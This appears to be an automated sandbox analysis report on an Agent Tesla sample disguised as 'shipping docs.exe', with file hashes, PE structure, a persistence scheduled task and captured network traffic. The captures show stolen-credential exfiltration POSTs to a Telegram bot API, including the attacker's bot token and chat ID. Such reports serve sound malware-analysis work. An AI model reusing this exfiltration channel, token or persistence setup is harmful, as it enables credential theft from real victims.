Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

Process: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe
File Type: XML 1.0 document, ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 1645
Entropy (8bit): 5.196605565254392
Encrypted: false
SSDEEP: 24:2dH4+SEqC/Q7hxlNMFp1/rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKBx3tn:cbh47TlNQ//rydbz9I3YODOLNdq3jd
MD5: FD5E93C3EBB783A2036F64992EA982BD
SHA1: 3D41B17EFE57C343E7C40FAD2F14EFEA143CB502
SHA-256: 9BD161BA3D8CD57B581AF3CB7879BCC2FE34A62E2C3BCF3B8CEA9E3FAD9DDCE2
SHA-512: 0707F1A58755FD8E38E22E5352C84FFE372C7F621A3EE48EE389AD5AC35F6AAE64696F59F032148D5B31913100A093777DA331B59FDE3ACA82B3E1549145E70C
Malicious: false
Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>computer\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>computer\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>computer\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>true

Process: C:\Users\user\Desktop\shipping docs.exe
File Type: XML 1.0 document, ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 1645
Entropy (8bit): 5.196605565254392
Encrypted: false
SSDEEP: 24:2dH4+SEqC/Q7hxlNMFp1/rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKBx3tn:cbh47TlNQ//rydbz9I3YODOLNdq3jd
MD5: FD5E93C3EBB783A2036F64992EA982BD
SHA1: 3D41B17EFE57C343E7C40FAD2F14EFEA143CB502
SHA-256: 9BD161BA3D8CD57B581AF3CB7879BCC2FE34A62E2C3BCF3B8CEA9E3FAD9DDCE2
SHA-512: 0707F1A58755FD8E38E22E5352C84FFE372C7F621A3EE48EE389AD5AC35F6AAE64696F59F032148D5B31913100A093777DA331B59FDE3ACA82B3E1549145E70C
Malicious: true
Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>computer\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>computer\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>computer\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>true

Process: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe
File Type: XML 1.0 document, ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 1645
Entropy (8bit): 5.196605565254392
Encrypted: false
SSDEEP: 24:2dH4+SEqC/Q7hxlNMFp1/rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKBx3tn:cbh47TlNQ//rydbz9I3YODOLNdq3jd
MD5: FD5E93C3EBB783A2036F64992EA982BD
SHA1: 3D41B17EFE57C343E7C40FAD2F14EFEA143CB502
SHA-256: 9BD161BA3D8CD57B581AF3CB7879BCC2FE34A62E2C3BCF3B8CEA9E3FAD9DDCE2
SHA-512: 0707F1A58755FD8E38E22E5352C84FFE372C7F621A3EE48EE389AD5AC35F6AAE64696F59F032148D5B31913100A093777DA331B59FDE3ACA82B3E1549145E70C
Malicious: false
Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>computer\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>computer\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>computer\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>true
                                                                                            Process:C:\Users\user\Desktop\shipping docs.exe
                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):606720
                                                                                            Entropy (8bit):7.88879203859592
                                                                                            Encrypted:false
                                                                                            SSDEEP:12288:ks2kzrbETClbHskFgFwIyXCDl+s30ki9Pi00uSGD6DWzEH:1176ChskFgqIyXoi9Pi00uSTHH
                                                                                            MD5:6308AE755A893C15A989B1CCF2C56393
                                                                                            SHA1:00ADA70AA14A5CF26A7F8CECBAAA437267D30A2A
                                                                                            SHA-256:9DFDB5048599B1083FE534CF5FE5A0440D71EB74B5497E506F0A0A4C23821F40
                                                                                            SHA-512:E03EAC82BF4174912D63CB8ECEED393320FE957F7A735FF0F720FBF558F9638E6FC051CB80607864CAAA8366CA0EDC2D44028367EF97D8020AD7B6F45EADDCD3
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                            • Antivirus: ReversingLabs, Detection: 73%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....U.c.................0...........N... ...`....@.. ....................................@..................................N..W....`.. ............................................................................ ............... ..H............text........ ...0.................. ..`.rsrc... ....`.......2..............@..@.reloc...............@..............@..B.................N......H............U......4...X...(^..........................................z.(......}.....( ...o!...}....*..0...........{............3.....(.....*..................0...........{......,....f.........}......}......}.......s....o....}.......}....8......{....o....}......{....}......}.............}.....{........Y}.....{....-...+H.{........{....X.{....X .;.|.{....Xa}......}.....{....o....:q....(....+..(........}.........(......*................n..}.....{....,..{....o....*..{....*.s".
Process:C:\Users\user\Desktop\shipping docs.exe
File Type:ASCII text, with CRLF line terminators
Category:modified
Size (bytes):26
Entropy (8bit):3.95006375643621
Encrypted:false
SSDEEP:3:ggPYV:rPYV
MD5:187F488E27DB4AF347237FE461A079AD
SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:true
Preview:[ZoneTransfer]....ZoneId=0
Process:C:\Users\user\Desktop\shipping docs.exe
File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):606720
Entropy (8bit):7.88879203859592
Encrypted:false
SSDEEP:12288:ks2kzrbETClbHskFgFwIyXCDl+s30ki9Pi00uSGD6DWzEH:1176ChskFgqIyXoi9Pi00uSTHH
MD5:6308AE755A893C15A989B1CCF2C56393
SHA1:00ADA70AA14A5CF26A7F8CECBAAA437267D30A2A
SHA-256:9DFDB5048599B1083FE534CF5FE5A0440D71EB74B5497E506F0A0A4C23821F40
SHA-512:E03EAC82BF4174912D63CB8ECEED393320FE957F7A735FF0F720FBF558F9638E6FC051CB80607864CAAA8366CA0EDC2D44028367EF97D8020AD7B6F45EADDCD3
Malicious:true
Antivirus:
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 73%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....U.c.................0...........N... ...`....@.. ....................................@..................................N..W....`.. ............................................................................ ............... ..H............text........ ...0.................. ..`.rsrc... ....`.......2..............@..@.reloc...............@..............@..B.................N......H............U......4...X...(^..........................................z.(......}.....( ...o!...}....*..0...........{............3.....(.....*..................0...........{......,....f.........}......}......}.......s....o....}.......}....8......{....o....}......{....}......}.............}.....{........Y}.....{....-...+H.{........{....X.{....X .;.|.{....Xa}......}.....{....o....:q....(....+..(........}.........(......*................n..}.....{....,..{....o....*..{....*.s".
File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):7.88879203859592
TrID:
• Win32 Executable (generic) Net Framework (10011505/4) 49.83%
• Win32 Executable (generic) a (10002005/4) 49.78%
• Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
• Generic Win/DOS Executable (2004/3) 0.01%
• DOS Executable Generic (2002/1) 0.01%
File name:shipping docs.exe
File size:606720
MD5:6308ae755a893c15a989b1ccf2c56393
SHA1:00ada70aa14a5cf26a7f8cecbaaa437267d30a2a
SHA256:9dfdb5048599b1083fe534cf5fe5a0440d71eb74b5497e506f0a0a4c23821f40
SHA512:e03eac82bf4174912d63cb8eceed393320fe957f7a735ff0f720fbf558f9638e6fc051cb80607864caaa8366ca0edc2d44028367ef97d8020ad7b6f45eaddcd3
SSDEEP:12288:ks2kzrbETClbHskFgFwIyXCDl+s30ki9Pi00uSGD6DWzEH:1176ChskFgqIyXoi9Pi00uSTHH
TLSH:D9D4023C224ABE2FC6BC99B958D296006FF1CD4D6110EF396EEE21D957CB3382741592
File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....U.c.................0...........N... ...`....@.. ....................................@................................
Icon Hash:828282a28c323068
Entrypoint:0x494eee
Entrypoint Section:.text
Digitally signed:false
Imagebase:0x400000
Subsystem:windows gui
Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:0x638455A2 [Mon Nov 28 06:30:58 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:4
OS Version Minor:0
File Version Major:4
File Version Minor:0
Subsystem Version Major:4
Subsystem Version Minor:0
Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
Instruction
jmp dword ptr [00402000h]
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x94e94          0x57          .text
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x96000          0xc20         .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x98000          0xc           .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x8           .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008           0x48          .text
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity     File Type  Entropy              Characteristics
.text   0x2000           0x92ef4       0x93000   False     0.8968630420918368  data       7.898839095668671    IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc   0x96000          0xc20         0xe00     False     0.5340401785714286  data       5.558555904519806    IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc  0x98000          0xc           0x200     False     0.044921875         data       0.10191042566270775  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name           RVA      Size   Type                                                         Language  Country
RT_ICON        0x960e8  0x7a7  PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
RT_GROUP_ICON  0x96890  0x14   data
RT_VERSION     0x968a4  0x37c  data
DLL          Import
mscoree.dll  _CorExeMain
Timestamp                 Protocol  SID      Message                                  Source Port  Dest Port  Source IP    Dest IP
11/29/22-21:19:34.793087  TCP       2851779  ETPRO TROJAN Agent Tesla Telegram Exfil  49699        443        192.168.2.3  149.154.167.220
11/29/22-21:20:32.964256  TCP       2851779  ETPRO TROJAN Agent Tesla Telegram Exfil  49700        443        192.168.2.3  149.154.167.220
11/29/22-21:20:48.592868  TCP       2851779  ETPRO TROJAN Agent Tesla Telegram Exfil  49701        443        192.168.2.3  149.154.167.220
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 29, 2022 21:19:34.306422949 CET | 49699 | 443 | 192.168.2.3 | 149.154.167.220
Nov 29, 2022 21:19:34.306468010 CET | 443 | 49699 | 149.154.167.220 | 192.168.2.3
Nov 29, 2022 21:19:34.306538105 CET | 49699 | 443 | 192.168.2.3 | 149.154.167.220
Nov 29, 2022 21:19:34.350533009 CET | 49699 | 443 | 192.168.2.3 | 149.154.167.220
Nov 29, 2022 21:19:34.350590944 CET | 443 | 49699 | 149.154.167.220 | 192.168.2.3
Nov 29, 2022 21:19:34.426537037 CET | 443 | 49699 | 149.154.167.220 | 192.168.2.3
Nov 29, 2022 21:19:34.426740885 CET | 49699 | 443 | 192.168.2.3 | 149.154.167.220
Nov 29, 2022 21:19:34.431344986 CET | 49699 | 443 | 192.168.2.3 | 149.154.167.220
Nov 29, 2022 21:19:34.431368113 CET | 443 | 49699 | 149.154.167.220 | 192.168.2.3
Nov 29, 2022 21:19:34.431643009 CET | 443 | 49699 | 149.154.167.220 | 192.168.2.3
Nov 29, 2022 21:19:34.495279074 CET | 49699 | 443 | 192.168.2.3 | 149.154.167.220
Nov 29, 2022 21:19:34.762609005 CET | 49699 | 443 | 192.168.2.3 | 149.154.167.220
Nov 29, 2022 21:19:34.762672901 CET | 443 | 49699 | 149.154.167.220 | 192.168.2.3
Nov 29, 2022 21:19:34.789762020 CET | 443 | 49699 | 149.154.167.220 | 192.168.2.3
Nov 29, 2022 21:19:34.792854071 CET | 49699 | 443 | 192.168.2.3 | 149.154.167.220
Nov 29, 2022 21:19:34.792897940 CET | 443 | 49699 | 149.154.167.220 | 192.168.2.3
Nov 29, 2022 21:19:34.934180021 CET | 443 | 49699 | 149.154.167.220 | 192.168.2.3
Nov 29, 2022 21:19:34.934380054 CET | 443 | 49699 | 149.154.167.220 | 192.168.2.3
Nov 29, 2022 21:19:34.934495926 CET | 49699 | 443 | 192.168.2.3 | 149.154.167.220
Nov 29, 2022 21:19:34.941884995 CET | 49699 | 443 | 192.168.2.3 | 149.154.167.220
Nov 29, 2022 21:20:32.434153080 CET | 49700 | 443 | 192.168.2.3 | 149.154.167.220
Nov 29, 2022 21:20:32.434236050 CET | 443 | 49700 | 149.154.167.220 | 192.168.2.3
Nov 29, 2022 21:20:32.434340954 CET | 49700 | 443 | 192.168.2.3 | 149.154.167.220
Nov 29, 2022 21:20:32.453962088 CET | 49700 | 443 | 192.168.2.3 | 149.154.167.220
Nov 29, 2022 21:20:32.454035997 CET | 443 | 49700 | 149.154.167.220 | 192.168.2.3
Nov 29, 2022 21:20:32.529711962 CET | 443 | 49700 | 149.154.167.220 | 192.168.2.3
Nov 29, 2022 21:20:32.529877901 CET | 49700 | 443 | 192.168.2.3 | 149.154.167.220
Nov 29, 2022 21:20:32.532382011 CET | 49700 | 443 | 192.168.2.3 | 149.154.167.220
Nov 29, 2022 21:20:32.532432079 CET | 443 | 49700 | 149.154.167.220 | 192.168.2.3
Nov 29, 2022 21:20:32.532835007 CET | 443 | 49700 | 149.154.167.220 | 192.168.2.3
Nov 29, 2022 21:20:32.640913963 CET | 49700 | 443 | 192.168.2.3 | 149.154.167.220
Nov 29, 2022 21:20:32.929069042 CET | 49700 | 443 | 192.168.2.3 | 149.154.167.220
Nov 29, 2022 21:20:32.929147959 CET | 443 | 49700 | 149.154.167.220 | 192.168.2.3
Nov 29, 2022 21:20:32.956907034 CET | 443 | 49700 | 149.154.167.220 | 192.168.2.3
Nov 29, 2022 21:20:32.963989973 CET | 49700 | 443 | 192.168.2.3 | 149.154.167.220
Nov 29, 2022 21:20:32.964052916 CET | 443 | 49700 | 149.154.167.220 | 192.168.2.3
Nov 29, 2022 21:20:33.190849066 CET | 443 | 49700 | 149.154.167.220 | 192.168.2.3
Nov 29, 2022 21:20:33.191063881 CET | 443 | 49700 | 149.154.167.220 | 192.168.2.3
Nov 29, 2022 21:20:33.191247940 CET | 49700 | 443 | 192.168.2.3 | 149.154.167.220
Nov 29, 2022 21:20:33.191715002 CET | 49700 | 443 | 192.168.2.3 | 149.154.167.220
Nov 29, 2022 21:20:47.552496910 CET | 49701 | 443 | 192.168.2.3 | 149.154.167.220
Nov 29, 2022 21:20:47.552612066 CET | 443 | 49701 | 149.154.167.220 | 192.168.2.3
Nov 29, 2022 21:20:47.552792072 CET | 49701 | 443 | 192.168.2.3 | 149.154.167.220
Nov 29, 2022 21:20:47.617912054 CET | 49701 | 443 | 192.168.2.3 | 149.154.167.220
Nov 29, 2022 21:20:47.617959023 CET | 443 | 49701 | 149.154.167.220 | 192.168.2.3
Nov 29, 2022 21:20:47.682044029 CET | 443 | 49701 | 149.154.167.220 | 192.168.2.3
Nov 29, 2022 21:20:47.682136059 CET | 49701 | 443 | 192.168.2.3 | 149.154.167.220
Nov 29, 2022 21:20:47.684530973 CET | 49701 | 443 | 192.168.2.3 | 149.154.167.220
Nov 29, 2022 21:20:47.684552908 CET | 443 | 49701 | 149.154.167.220 | 192.168.2.3
Nov 29, 2022 21:20:47.684855938 CET | 443 | 49701 | 149.154.167.220 | 192.168.2.3
Nov 29, 2022 21:20:47.890943050 CET | 443 | 49701 | 149.154.167.220 | 192.168.2.3
Nov 29, 2022 21:20:47.891128063 CET | 49701 | 443 | 192.168.2.3 | 149.154.167.220
Nov 29, 2022 21:20:48.564800978 CET | 49701 | 443 | 192.168.2.3 | 149.154.167.220
Nov 29, 2022 21:20:48.564868927 CET | 443 | 49701 | 149.154.167.220 | 192.168.2.3
Nov 29, 2022 21:20:48.591984034 CET | 443 | 49701 | 149.154.167.220 | 192.168.2.3
Nov 29, 2022 21:20:48.592714071 CET | 49701 | 443 | 192.168.2.3 | 149.154.167.220
Nov 29, 2022 21:20:48.592767954 CET | 443 | 49701 | 149.154.167.220 | 192.168.2.3
Nov 29, 2022 21:20:48.679336071 CET | 443 | 49701 | 149.154.167.220 | 192.168.2.3
Nov 29, 2022 21:20:48.679500103 CET | 443 | 49701 | 149.154.167.220 | 192.168.2.3
Nov 29, 2022 21:20:48.679678917 CET | 49701 | 443 | 192.168.2.3 | 149.154.167.220
Nov 29, 2022 21:20:48.680298090 CET | 49701 | 443 | 192.168.2.3 | 149.154.167.220
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 29, 2022 21:19:34.235759974 CET | 49977 | 53 | 192.168.2.3 | 8.8.8.8
Nov 29, 2022 21:19:34.253768921 CET | 53 | 49977 | 8.8.8.8 | 192.168.2.3
Nov 29, 2022 21:20:32.392975092 CET | 57840 | 53 | 192.168.2.3 | 8.8.8.8
Nov 29, 2022 21:20:32.412163019 CET | 53 | 57840 | 8.8.8.8 | 192.168.2.3
Nov 29, 2022 21:20:47.509844065 CET | 57990 | 53 | 192.168.2.3 | 8.8.8.8
Nov 29, 2022 21:20:47.527040005 CET | 53 | 57990 | 8.8.8.8 | 192.168.2.3
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 29, 2022 21:19:34.235759974 CET | 192.168.2.3 | 8.8.8.8 | 0x7d34 | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false
Nov 29, 2022 21:20:32.392975092 CET | 192.168.2.3 | 8.8.8.8 | 0xd170 | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false
Nov 29, 2022 21:20:47.509844065 CET | 192.168.2.3 | 8.8.8.8 | 0x8851 | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 29, 2022 21:18:52.397281885 CET | 8.8.8.8 | 192.168.2.3 | 0x741b | No error (0) | au.c-0001.c-msedge.net | c-0001.c-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false
Nov 29, 2022 21:18:52.397281885 CET | 8.8.8.8 | 192.168.2.3 | 0x741b | No error (0) | c-0001.c-msedge.net | | 13.107.4.50 | A (IP address) | IN (0x0001) | false
Nov 29, 2022 21:19:34.253768921 CET | 8.8.8.8 | 192.168.2.3 | 0x7d34 | No error (0) | api.telegram.org | | 149.154.167.220 | A (IP address) | IN (0x0001) | false
Nov 29, 2022 21:20:32.412163019 CET | 8.8.8.8 | 192.168.2.3 | 0xd170 | No error (0) | api.telegram.org | | 149.154.167.220 | A (IP address) | IN (0x0001) | false
Nov 29, 2022 21:20:47.527040005 CET | 8.8.8.8 | 192.168.2.3 | 0x8851 | No error (0) | api.telegram.org | | 149.154.167.220 | A (IP address) | IN (0x0001) | false
                                                                                            • api.telegram.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.3 | 49699 | 149.154.167.220 | 443 | C:\Users\user\Desktop\shipping docs.exe

Timestamp | kBytes transferred | Direction | Data
2022-11-29 20:19:34 UTC | 0 | OUT | POST /bot5676971476:AAFdGsXW8kwzXNIluAGV-a4sJ2XBy68O9WI/sendDocument HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------8dad24f67b2ac65
Host: api.telegram.org
Content-Length: 1006
Expect: 100-continue
Connection: Keep-Alive
2022-11-29 20:19:34 UTC | 0 | IN | HTTP/1.1 100 Continue
2022-11-29 20:19:34 UTC | 0 | OUT | Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 64 32 34 66 36 37 62 32 61 63 36 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 36 34 34 35 38 34 35 33 36 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 64 32 34 66 36 37 62 32 61 63 36 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 50 57 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 55 73 65 72 20 4e 61 6d 65 3a 20 68 61 72 64 7a 2f 36 31 38 33 32 31 0a 4f 53 46 75 6c 6c
Data Ascii: -----------------------------8dad24f67b2ac65Content-Disposition: form-data; name="chat_id"1644584536-----------------------------8dad24f67b2ac65Content-Disposition: form-data; name="caption"New PW Recovered!User Name: user/618321OSFull
2022-11-29 20:19:34 UTC | 1 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Tue, 29 Nov 2022 20:19:34 GMT
Content-Type: application/json
Content-Length: 644
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
{"ok":true,"result":{"message_id":310,"from":{"id":5676971476,"is_bot":true,"first_name":"strongerman","username":"strongermanbot"},"chat":{"id":1644584536,"first_name":"rodriguez","last_name":"david","username":"rodeiguez1b","type":"private"},"date":1669753174,"document":{"file_name":"user-618321 2022-11-29 21-19-30.html","mime_type":"text/html","file_id":"BQACAgQAAxkDAAIBNmOGaVZkeJOlahMd7RgEEfRREDp1AAKGEAACD804UE5y_p8XQxsMKwQ","file_unique_id":"AgADhhAAAg_NOFA","file_size":436},"caption":"New PW Recovered!\n\nUser Name: user/618321\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB"}}


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.3 | 49700 | 149.154.167.220 | 443 | C:\Users\user\Desktop\shipping docs.exe

Timestamp | kBytes transferred | Direction | Data
2022-11-29 20:20:32 UTC | 2 | OUT | POST /bot5676971476:AAFdGsXW8kwzXNIluAGV-a4sJ2XBy68O9WI/sendDocument HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------8dad24f8bdcd188
Host: api.telegram.org
Content-Length: 1006
Expect: 100-continue
Connection: Keep-Alive
2022-11-29 20:20:32 UTC | 2 | IN | HTTP/1.1 100 Continue
2022-11-29 20:20:32 UTC | 2 | OUT | Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 64 32 34 66 38 62 64 63 64 31 38 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 36 34 34 35 38 34 35 33 36 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 64 32 34 66 38 62 64 63 64 31 38 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 50 57 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 55 73 65 72 20 4e 61 6d 65 3a 20 68 61 72 64 7a 2f 36 31 38 33 32 31 0a 4f 53 46 75 6c 6c
Data Ascii: -----------------------------8dad24f8bdcd188Content-Disposition: form-data; name="chat_id"1644584536-----------------------------8dad24f8bdcd188Content-Disposition: form-data; name="caption"New PW Recovered!User Name: user/618321OSFull
2022-11-29 20:20:33 UTC | 3 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Tue, 29 Nov 2022 20:20:33 GMT
Content-Type: application/json
Content-Length: 644
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
